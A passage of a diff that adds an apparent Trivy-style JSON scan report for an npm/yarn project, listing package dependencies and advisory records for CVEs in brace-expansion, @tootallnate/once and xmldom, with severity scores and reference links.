"Licenses": [ + "MIT" + ], + "DependsOn": [ + "mkdirp@1.0.4", + "rimraf@3.0.2" + ], + "Locations": [ + { + "StartLine": 2048, + "EndLine": 2054 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@pkgjs/parseargs@0.11.0", + "Name": "@pkgjs/parseargs", + "Identifier": { + "PURL": "pkg:npm/%40pkgjs/parseargs@0.11.0", + "UID": "a29b000cbd87ed12" + }, + "Version": "0.11.0", + "Licenses": [ + "MIT" + ], + "Locations": [ + { + "StartLine": 2096, + "EndLine": 2099 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@react-native-community/push-notification-ios@1.12.0", + "Name": "@react-native-community/push-notification-ios", + "Identifier": { + "PURL": "pkg:npm/%40react-native-community/push-notification-ios@1.12.0", + "UID": "385c7594af72e2d" + }, + "Version": "1.12.0", + "Licenses": [ + "MIT" + ], + "DependsOn": [ + "invariant@2.2.4" + ], + "Locations": [ + { + "StartLine": 2376, + "EndLine": 2381 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "@tootallnate/once@1.1.2", + "Name": "@tootallnate/once", + "Identifier": { + "PURL": "pkg:npm/%40tootallnate/once@1.1.2", + "UID": "a9c0266fb34361f" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Locations": [ + { + "StartLine": 2837, + "EndLine": 2840 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "abbrev@1.1.1", + "Name": "abbrev", + "Identifier": { + "PURL": "pkg:npm/abbrev@1.1.1", + "UID": "f64943c30a745dbe" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "Locations": [ + { + "StartLine": 3172, + "EndLine": 3175 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "agent-base@6.0.2", + "Name": "agent-base", + "Identifier": { + "PURL": "pkg:npm/agent-base@6.0.2", + "UID": "6ba99e0ff79877c8" + }, + "Version": "6.0.2", + "Licenses": [ + "MIT" + ], + "DependsOn": [ + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 3214, + "EndLine": 3219 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "agentkeepalive@4.6.0", + "Name": "agentkeepalive", + "Identifier": { + "PURL": "pkg:npm/agentkeepalive@4.6.0", + "UID": "8ccedbc05fce81c7" + }, + "Version": "4.6.0", + "Licenses": [ + "MIT" + ], + "DependsOn": [ + "humanize-ms@1.2.1" + ], + "Locations": [ + { + "StartLine": 3221, + "EndLine": 3226 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "aggregate-error@3.1.0", + "Name": "aggregate-error", + "Identifier": { + "PURL": "pkg:npm/aggregate-error@3.1.0", + "UID": "5aba1602e6c0daa1" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "DependsOn": [ + "clean-stack@2.2.0", + "indent-string@4.0.0" + ], + "Locations": [ + { + "StartLine": 3228, + "EndLine": 3234 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "are-we-there-yet@3.0.1", + "Name": "are-we-there-yet", + "Identifier": { + "PURL": "pkg:npm/are-we-there-yet@3.0.1", + "UID": "3bac295653a18b17" + }, + "Version": "3.0.1", + "Licenses": [ + "ISC" + ], + "DependsOn": [ + "delegates@1.0.0", + "readable-stream@3.6.2" + ], + "Locations": [ + { + "StartLine": 3346, + "EndLine": 3352 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "bare-fs@4.4.5", + "Name": "bare-fs", + "Identifier": { + "PURL": "pkg:npm/bare-fs@4.4.5", + "UID": "f47e92691969bd6a" + }, + "Version": "4.4.5", + "Licenses": [ + "Apache-2.0" + ], + "DependsOn": [ + "bare-events@2.7.0", + "bare-path@3.0.0", + "bare-stream@2.7.0", + "bare-url@2.2.2", + "fast-fifo@1.3.2" + ], + "Locations": [ + { + "StartLine": 3642, + "EndLine": 3651 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "bare-os@3.6.2", + "Name": "bare-os", + "Identifier": { + "PURL": "pkg:npm/bare-os@3.6.2", + "UID": "ac528c14ae6b1c1a" + }, + "Version": "3.6.2", + "Licenses": [ + "Apache-2.0" + ], + "Locations": [ + { + "StartLine": 3653, + "EndLine": 3656 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "bare-path@3.0.0", + "Name": "bare-path", + "Identifier": { + "PURL": "pkg:npm/bare-path@3.0.0", + "UID": "7f0f0b5991770c96" + }, + "Version": "3.0.0", + "Licenses": [ + "Apache-2.0" + ], + "DependsOn": [ + "bare-os@3.6.2" + ], + "Locations": [ + { + "StartLine": 3658, + "EndLine": 3663 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "bare-stream@2.7.0", + "Name": "bare-stream", + "Identifier": { + "PURL": "pkg:npm/bare-stream@2.7.0", + "UID": "904447f6f73d3f7c" + }, + "Version": "2.7.0", + "Licenses": [ + "Apache-2.0" + ], + "DependsOn": [ + "streamx@2.23.0" + ], + "Locations": [ + { + "StartLine": 3665, + "EndLine": 3670 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "bare-url@2.2.2", + "Name": "bare-url", + "Identifier": { + "PURL": "pkg:npm/bare-url@2.2.2", + "UID": "5982c8c8569aaa42" + }, + "Version": "2.2.2", + "Licenses": [ + "Apache-2.0" + ], + "DependsOn": [ + "bare-path@3.0.0" + ], + "Locations": [ + { + "StartLine": 3672, + "EndLine": 3677 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "bindings@1.5.0", + "Name": "bindings", + "Identifier": { + "PURL": "pkg:npm/bindings@1.5.0", + "UID": "2242a7630ae93d39" + }, + "Version": "1.5.0", + "Licenses": [ + "MIT" + ], + "DependsOn": [ + "file-uri-to-path@1.0.0" + ], + "Locations": [ + { + "StartLine": 3728, + "EndLine": 3733 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "cacache@15.3.0", + "Name": "cacache", + "Identifier": { + "PURL": "pkg:npm/cacache@15.3.0", + "UID": "3037619de9081f18" + }, + "Version": "15.3.0", + "Licenses": [ + "ISC" + ], + "DependsOn": [ + "@npmcli/fs@1.1.1", + "@npmcli/move-file@1.1.2", + "chownr@2.0.0", + "fs-minipass@2.1.0", + "glob@7.2.3", + "infer-owner@1.0.4", + "lru-cache@6.0.0", + "minipass@3.3.6", + "minipass-collect@1.0.2", + "minipass-flush@1.0.5", + "minipass-pipeline@1.2.4", + "mkdirp@1.0.4", + "p-map@4.0.0", + "promise-inflight@1.0.1", + "rimraf@3.0.2", + "ssri@8.0.1", + "tar@6.2.1", + "unique-filename@1.1.1" + ], + "Locations": [ + { + "StartLine": 3847, + "EndLine": 3869 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "chownr@2.0.0", + "Name": "chownr", + "Identifier": { + "PURL": "pkg:npm/chownr@2.0.0", + "UID": "37993bf5dd25037a" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Locations": [ + { + "StartLine": 3994, + "EndLine": 3997 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "clean-stack@2.2.0", + "Name": "clean-stack", + "Identifier": { + "PURL": "pkg:npm/clean-stack@2.2.0", + "UID": "4a05d69a57207a36" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Locations": [ + { + "StartLine": 4049, + "EndLine": 4052 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "color-support@1.1.3", + "Name": "color-support", + "Identifier": { + "PURL": "pkg:npm/color-support@1.1.3", + "UID": "979eb97204d778dd" + }, + "Version": "1.1.3", + "Licenses": [ + "ISC" + ], + "Locations": [ + { + "StartLine": 4186, + "EndLine": 4189 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "file-uri-to-path@1.0.0", + "Name": "file-uri-to-path", + "Identifier": { + "PURL": "pkg:npm/file-uri-to-path@1.0.0", + "UID": "c9b66031127e05cc" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Locations": [ + { + "StartLine": 5297, + "EndLine": 5300 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "fs-minipass@2.1.0", + "Name": "fs-minipass", + "Identifier": { + "PURL": "pkg:npm/fs-minipass@2.1.0", + "UID": "47dafbd7cbefc8a" + }, + "Version": "2.1.0", + "Licenses": [ + "ISC" + ], + "DependsOn": [ + "minipass@3.3.6" + ], + "Locations": [ + { + "StartLine": 5502, + "EndLine": 5507 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "gauge@4.0.4", + "Name": "gauge", + "Identifier": { + "PURL": "pkg:npm/gauge@4.0.4", + "UID": "7d249c9773465e8c" + }, + "Version": "4.0.4", + "Licenses": [ + "ISC" + ], + "DependsOn": [ + "aproba@1.2.0", + "color-support@1.1.3", + "console-control-strings@1.1.0", + "has-unicode@2.0.1", + "signal-exit@3.0.7", + "string-width@4.2.3", + "strip-ansi@6.0.1", + "wide-align@1.1.5" + ], + "Locations": [ + { + "StartLine": 5543, + "EndLine": 5555 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "http-proxy-agent@4.0.1", + "Name": "http-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/http-proxy-agent@4.0.1", + "UID": "356f3325bfd18cd6" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "DependsOn": [ + "@tootallnate/once@1.1.2", + "agent-base@6.0.2", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 5913, + "EndLine": 5920 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "https-proxy-agent@5.0.1", + "Name": "https-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/https-proxy-agent@5.0.1", + "UID": "54ea7a040b759ec5" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "DependsOn": [ + "agent-base@6.0.2", + "debug@4.4.3" + ], + "Locations": [ + { + "StartLine": 5930, + "EndLine": 5936 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "humanize-ms@1.2.1", + "Name": "humanize-ms", + "Identifier": { + "PURL": "pkg:npm/humanize-ms@1.2.1", + "UID": "23a7e4fb7735aa94" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "DependsOn": [ + "ms@2.1.3" + ], + "Locations": [ + { + "StartLine": 5959, + "EndLine": 5964 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "infer-owner@1.0.4", + "Name": "infer-owner", + "Identifier": { + "PURL": "pkg:npm/infer-owner@1.0.4", + "UID": "fe4f5e75ad65b18f" + }, + "Version": "1.0.4", + "Licenses": [ + "ISC" + ], + "Locations": [ + { + "StartLine": 6040, + "EndLine": 6043 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "is-lambda@1.0.1", + "Name": "is-lambda", + "Identifier": { + "PURL": "pkg:npm/is-lambda@1.0.1", + "UID": "ade253a654ff58ee" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Locations": [ + { + "StartLine": 6255, + "EndLine": 6258 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "make-fetch-happen@9.1.0", + "Name": "make-fetch-happen", + "Identifier": { + "PURL": "pkg:npm/make-fetch-happen@9.1.0", + "UID": "e3e073f9016fc66" + }, + "Version": "9.1.0", + "Licenses": [ + "ISC" + ], + "DependsOn": [ + "agentkeepalive@4.6.0", + "cacache@15.3.0", + "http-cache-semantics@4.2.0", + "http-proxy-agent@4.0.1", + "https-proxy-agent@5.0.1", + "is-lambda@1.0.1", + "lru-cache@6.0.0", + "minipass@3.3.6", + "minipass-collect@1.0.2", + "minipass-fetch@1.4.1", + "minipass-flush@1.0.5", + "minipass-pipeline@1.2.4", + "negotiator@0.6.4", + "promise-retry@2.0.1", + "socks-proxy-agent@6.2.1", + "ssri@8.0.1" + ], + "Locations": [ + { + "StartLine": 7302, + "EndLine": 7322 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minipass@5.0.0", + "Name": "minipass", + "Identifier": { + "PURL": "pkg:npm/minipass@5.0.0", + "UID": "7108929cc786d8ff" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Locations": [ + { + "StartLine": 7829, + "EndLine": 7832 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minipass-collect@1.0.2", + "Name": "minipass-collect", + "Identifier": { + "PURL": "pkg:npm/minipass-collect@1.0.2", + "UID": "bc70745f3a4e9cad" + }, + "Version": "1.0.2", + "Licenses": [ + "ISC" + ], + "DependsOn": [ + "minipass@3.3.6" + ], + "Locations": [ + { + "StartLine": 7736, + "EndLine": 7741 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minipass-fetch@1.4.1", + "Name": "minipass-fetch", + "Identifier": { + "PURL": "pkg:npm/minipass-fetch@1.4.1", + "UID": "7326f59cae7c8f2e" + }, + "Version": "1.4.1", + "Licenses": [ + "MIT" + ], + "DependsOn": [ + "minipass@3.3.6", + "minipass-sized@1.0.3", + "minizlib@2.1.2" + ], + "Locations": [ + { + "StartLine": 7750, + "EndLine": 7759 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "minizlib@2.1.2", + "Name": "minizlib", + "Identifier": { + "PURL": "pkg:npm/minizlib@2.1.2", + "UID": "eeff86540ebe0b5" + }, + "Version": "2.1.2", + "Licenses": [ + "MIT" + ], + "DependsOn": [ + "minipass@3.3.6", + "yallist@4.0.0" + ], + "Locations": [ + { + "StartLine": 7834, + "EndLine": 7840 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "node-addon-api@7.1.1", + "Name": "node-addon-api", + "Identifier": { + "PURL": "pkg:npm/node-addon-api@7.1.1", + "UID": "f8ceef8ff57628ca" + }, + "Version": "7.1.1", + "Licenses": [ + "MIT" + ], + "Locations": [ + { + "StartLine": 7932, + "EndLine": 7935 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "node-gyp@8.4.1", + "Name": "node-gyp", + "Identifier": { + "PURL": "pkg:npm/node-gyp@8.4.1", + "UID": "f194ed5305db0814" + }, + "Version": "8.4.1", + "Licenses": [ + "MIT" + ], + "DependsOn": [ + "env-paths@2.2.1", + "glob@7.2.3", + "graceful-fs@4.2.11", + "make-fetch-happen@9.1.0", + "nopt@5.0.0", + "npmlog@6.0.2", + "rimraf@3.0.2", + "semver@7.7.3", + "tar@6.2.1", + "which@2.0.2" + ], + "Locations": [ + { + "StartLine": 7959, + "EndLine": 7973 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "nopt@5.0.0", + "Name": "nopt", + "Identifier": { + "PURL": "pkg:npm/nopt@5.0.0", + "UID": "335f30552b5a96a5" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "DependsOn": [ + "abbrev@1.1.1" + ], + "Locations": [ + { + "StartLine": 8003, + "EndLine": 8008 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "npmlog@6.0.2", + "Name": "npmlog", + "Identifier": { + "PURL": "pkg:npm/npmlog@6.0.2", + "UID": "c8f943aaa07a0941" + }, + "Version": "6.0.2", + "Licenses": [ + "ISC" + ], + "DependsOn": [ + "are-we-there-yet@3.0.1", + "console-control-strings@1.1.0", + "gauge@4.0.4", + "set-blocking@2.0.0" + ], + "Locations": [ + { + "StartLine": 8187, + "EndLine": 8195 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "p-map@4.0.0", + "Name": "p-map", + "Identifier": { + "PURL": "pkg:npm/p-map@4.0.0", + "UID": "38e15f179e0de519" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "DependsOn": [ + "aggregate-error@3.1.0" + ], + "Locations": [ + { + "StartLine": 8412, + "EndLine": 8417 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "promise-inflight@1.0.1", + "Name": "promise-inflight", + "Identifier": { + "PURL": "pkg:npm/promise-inflight@1.0.1", + "UID": "9f2c70aebe78916" + }, + "Version": "1.0.1", + "Licenses": [ + "ISC" + ], + "Locations": [ + { + "StartLine": 8698, + "EndLine": 8701 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "socks-proxy-agent@6.2.1", + "Name": "socks-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/socks-proxy-agent@6.2.1", + "UID": "e5dc075630112ec1" + }, + "Version": "6.2.1", + "Licenses": [ + "MIT" + ], + "DependsOn": [ + "agent-base@6.0.2", + "debug@4.4.3", + "socks@2.8.7" + ], + "Locations": [ + { + "StartLine": 10034, + "EndLine": 10041 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "sqlite3@5.1.7", + "Name": "sqlite3", + "Identifier": { + "PURL": "pkg:npm/sqlite3@5.1.7", + "UID": "62612dd9809f7b52" + }, + "Version": "5.1.7", + "Licenses": [ + "BSD-3-Clause" + ], + "DependsOn": [ + "bindings@1.5.0", + "node-addon-api@7.1.1", + "prebuild-install@7.1.3", + "tar@6.2.1" + ], + "Locations": [ + { + "StartLine": 10148, + "EndLine": 10158 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ssri@8.0.1", + "Name": "ssri", + "Identifier": { + "PURL": "pkg:npm/ssri@8.0.1", + "UID": "f4ec868668b12626" + }, + "Version": "8.0.1", + "Licenses": [ + "ISC" + ], + "DependsOn": [ + "minipass@3.3.6" + ], + "Locations": [ + { + "StartLine": 10165, + "EndLine": 10170 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "tar@6.2.1", + "Name": "tar", + "Identifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "c4ef5ba6cdfac8c6" + }, + "Version": "6.2.1", + "Licenses": [ + "ISC" + ], + "DependsOn": [ + "chownr@2.0.0", + "fs-minipass@2.1.0", + "minipass@5.0.0", + "minizlib@2.1.2", + "mkdirp@1.0.4", + "yallist@4.0.0" + ], + "Locations": [ + { + "StartLine": 10536, + "EndLine": 10546 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "unique-filename@1.1.1", + "Name": "unique-filename", + "Identifier": { + "PURL": "pkg:npm/unique-filename@1.1.1", + "UID": "13521e138de66b3d" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "DependsOn": [ + "unique-slug@2.0.2" + ], + "Locations": [ + { + "StartLine": 10849, + "EndLine": 10854 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "unique-slug@2.0.2", + "Name": "unique-slug", + "Identifier": { + "PURL": "pkg:npm/unique-slug@2.0.2", + "UID": "95e6bbfc76b8bb62" + }, + "Version": "2.0.2", + "Licenses": [ + "ISC" + ], + "DependsOn": [ + "imurmurhash@0.1.4" + ], + "Locations": [ + { + "StartLine": 10861, + "EndLine": 10866 + } + ], + "AnalyzedBy": "yarn" + } + ], + "Vulnerabilities": [ + { + "VulnerabilityID": "CVE-2026-25547", + "VendorIDs": [ + "GHSA-7h2j-956f-4vf2" + ], + "PkgID": "@isaacs/brace-expansion@5.0.0", + "PkgName": "@isaacs/brace-expansion", + "PkgIdentifier": { + "PURL": "pkg:npm/%40isaacs/brace-expansion@5.0.0", + "UID": "885a889e7cdb5828" + }, + "InstalledVersion": "5.0.0", + "FixedVersion": "5.0.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-25547", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:01da549f9dd0e9f129f3f310d476309a104cbe82146ac22ff3fda1c9158ac472", + "Title": "brace-expansion: brace-expansion: Denial of Service via unbounded brace range expansion", + "Description": "@isaacs/brace-expansion is a hybrid CJS/ESM TypeScript fork of brace-expansion. Prior to version 5.0.1, @isaacs/brace-expansion is vulnerable to a denial of service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process. This issue has been patched in version 5.0.1.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-1333" + ], + "VendorSeverity": { + "alma": 3, + "ghsa": 3, + "oracle-oval": 3, + "redhat": 2, + "rocky": 3 + }, + "CVSS": { + "ghsa": { + "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N", + "V40Score": 8.7 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", + "V3Score": 6.5 + } + }, + "References": [ + "https://access.redhat.com/errata/RHSA-2026:7350", + "https://access.redhat.com/security/cve/CVE-2026-25547", + "https://bugzilla.redhat.com/2431340", + "https://bugzilla.redhat.com/2436942", + "https://bugzilla.redhat.com/2441268", + "https://bugzilla.redhat.com/2447140", + "https://bugzilla.redhat.com/2447141", + "https://bugzilla.redhat.com/2447142", + "https://bugzilla.redhat.com/2447143", + "https://bugzilla.redhat.com/2447144", + "https://bugzilla.redhat.com/2447145", + "https://bugzilla.redhat.com/2448754", + "https://bugzilla.redhat.com/2453037", + "https://bugzilla.redhat.com/2453151", + "https://bugzilla.redhat.com/2453152", + "https://bugzilla.redhat.com/2453157", + "https://bugzilla.redhat.com/2453158", + "https://bugzilla.redhat.com/2453160", + "https://bugzilla.redhat.com/2453161", + "https://bugzilla.redhat.com/2453162", + "https://bugzilla.redhat.com/show_bug.cgi?id=2431340", + "https://bugzilla.redhat.com/show_bug.cgi?id=2436942", + "https://bugzilla.redhat.com/show_bug.cgi?id=2441268", + "https://bugzilla.redhat.com/show_bug.cgi?id=2447140", + "https://bugzilla.redhat.com/show_bug.cgi?id=2447141", + "https://bugzilla.redhat.com/show_bug.cgi?id=2447142", + "https://bugzilla.redhat.com/show_bug.cgi?id=2447143", + "https://bugzilla.redhat.com/show_bug.cgi?id=2447144", + "https://bugzilla.redhat.com/show_bug.cgi?id=2447145", + "https://bugzilla.redhat.com/show_bug.cgi?id=2448754", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453037", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453151", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453152", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453157", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453158", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453160", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453161", + "https://bugzilla.redhat.com/show_bug.cgi?id=2453162", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1525", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1527", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1528", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21711", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21712", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21713", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21714", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21715", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21716", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21717", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2229", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25547", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2581", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135", + "https://errata.almalinux.org/9/ALSA-2026-7350.html", + "https://errata.rockylinux.org/RLSA-2026:7350", + "https://github.com/isaacs/brace-expansion", + "https://github.com/isaacs/brace-expansion/security/advisories/GHSA-7h2j-956f-4vf2", + "https://linux.oracle.com/cve/CVE-2026-25547.html", + "https://linux.oracle.com/errata/ELSA-2026-7675.html", + "https://nvd.nist.gov/vuln/detail/CVE-2026-25547", + "https://www.cve.org/CVERecord?id=CVE-2026-25547" + ], + "PublishedDate": "2026-02-04T22:16:00.813Z", + "LastModifiedDate": "2026-04-15T00:35:42.02Z" + }, + { + "VulnerabilityID": "CVE-2026-3449", + "VendorIDs": [ + "GHSA-vpq2-c234-7xj6" + ], + "PkgID": "@tootallnate/once@1.1.2", + "PkgName": "@tootallnate/once", + "PkgIdentifier": { + "PURL": "pkg:npm/%40tootallnate/once@1.1.2", + "UID": "a9c0266fb34361f" + }, + "InstalledVersion": "1.1.2", + "FixedVersion": "3.0.1", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-3449", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:71441370e0dee1ebd49c5f3160dbc1c12c12c79fce53da2deb8439b1424f7e67", + "Title": "@tootallnate/once: @tootallnate/once: Denial of Service due to incorrect control flow scoping with AbortSignal", + "Description": "Versions of the package @tootallnate/once before 3.0.1 are vulnerable to Incorrect Control Flow Scoping in promise resolving when AbortSignal option is used. The Promise remains in a permanently pending state after the signal is aborted, causing any await or .then() usage to hang indefinitely. This can cause a control-flow leak that can lead to stalled requests, blocked workers, or degraded application availability.", + "Severity": "LOW", + "CweIDs": [ + "CWE-705" + ], + "VendorSeverity": { + "ghsa": 1, + "redhat": 2 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", + "V40Vector": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P", + "V3Score": 3.3, + "V40Score": 1.9 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "V3Score": 4 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-3449", + "https://github.com/TooTallNate/once", + "https://github.com/TooTallNate/once/commit/b9f43cc5259bee2952d91ad3cdbd201a82df448a", + "https://github.com/TooTallNate/once/issues/8", + "https://nvd.nist.gov/vuln/detail/CVE-2026-3449", + "https://security.snyk.io/vuln/SNYK-JS-TOOTALLNATEONCE-15250612", + "https://www.cve.org/CVERecord?id=CVE-2026-3449" + ], + "PublishedDate": "2026-03-03T05:17:25.017Z", + "LastModifiedDate": "2026-03-03T21:52:29.877Z" + }, + { + "VulnerabilityID": "CVE-2026-34601", + "VendorIDs": [ + "GHSA-wh4c-j3r5-mjhp" + ], + "PkgID": "@xmldom/xmldom@0.8.11", + "PkgName": "@xmldom/xmldom", + "PkgIdentifier": { + "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", + "UID": "df38f0b8448f89b9" + }, + "InstalledVersion": "0.8.11", + "FixedVersion": "0.8.12, 0.9.9", + "Status": "fixed", + "SeveritySource": "ghsa", + "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-34601", + "DataSource": { + "ID": "ghsa", + "Name": "GitHub Security Advisory npm", + "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" + }, + "Fingerprint": "sha256:9e314e5d3d2085fb58956e52293e9b59a19926fae15ccf8c8a906d6e54481e86", + "Title": "xmldom: xmldom: XML structure injection via CDATA terminator", + "Description": "xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) `DOMParser` and `XMLSerializer` module. In xmldom versions 0.6.0 and prior and @xmldom/xmldom prior to versions 0.8.12 and 0.9.9, xmldom/xmldom allows attacker-controlled strings containing the CDATA terminator ]]\u003e to be inserted into a CDATASection node. During serialization, XMLSerializer emitted the CDATA content verbatim without rejecting or safely splitting the terminator. As a result, data intended to remain text-only became active XML markup in the serialized output, enabling XML structure injection and downstream business-logic manipulation. This issue has been patched in xmldom version 0.6.0 and @xmldom/xmldom versions 0.8.12 and 0.9.9.", + "Severity": "HIGH", + "CweIDs": [ + "CWE-91" + ], + "VendorSeverity": { + "ghsa": 3, + "redhat": 3 + }, + "CVSS": { + "ghsa": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 7.5 + }, + "redhat": { + "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "V3Score": 7.5 + } + }, + "References": [ + "https://access.redhat.com/security/cve/CVE-2026-34601", + "https://github.com/xmldom/xmldom", + "https://github.com/xmldom/xmldom/commit/2b852e836ab86dbbd6cbaf0537f584dd0b5ac184", + "https://github.com/xmldom/xmldom/releases/tag/0.8.12", + "https://github.com/xmldom/xmldom/releases/tag/0.9.9", + "https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp", + "https://nvd.nist.gov/vuln/detail/CVE-2026-34601", + "https://www.cve.org/CVERecord?id=CVE-2026-34601" + ], + "PublishedDate": "2026-04-02T18:16:31.933Z", + "LastModifiedDate": "2026-04-16T14:57:08.337Z" + }, + { + "VulnerabilityID": "CVE-2026-41672", + "VendorIDs": [ + "GHSA-j759-j44w-7fr8" + ], + "PkgID": "@xmldom/xmldom@0.8.11", + "PkgName": "@xmldom/xmldom", + "PkgIdentifier": { + "PURL": "pkg:npm/%40xmldom/xmldom@0.8.11", + "UID": "df38f0b8448f89b9" + }, + "InstalledVersion": 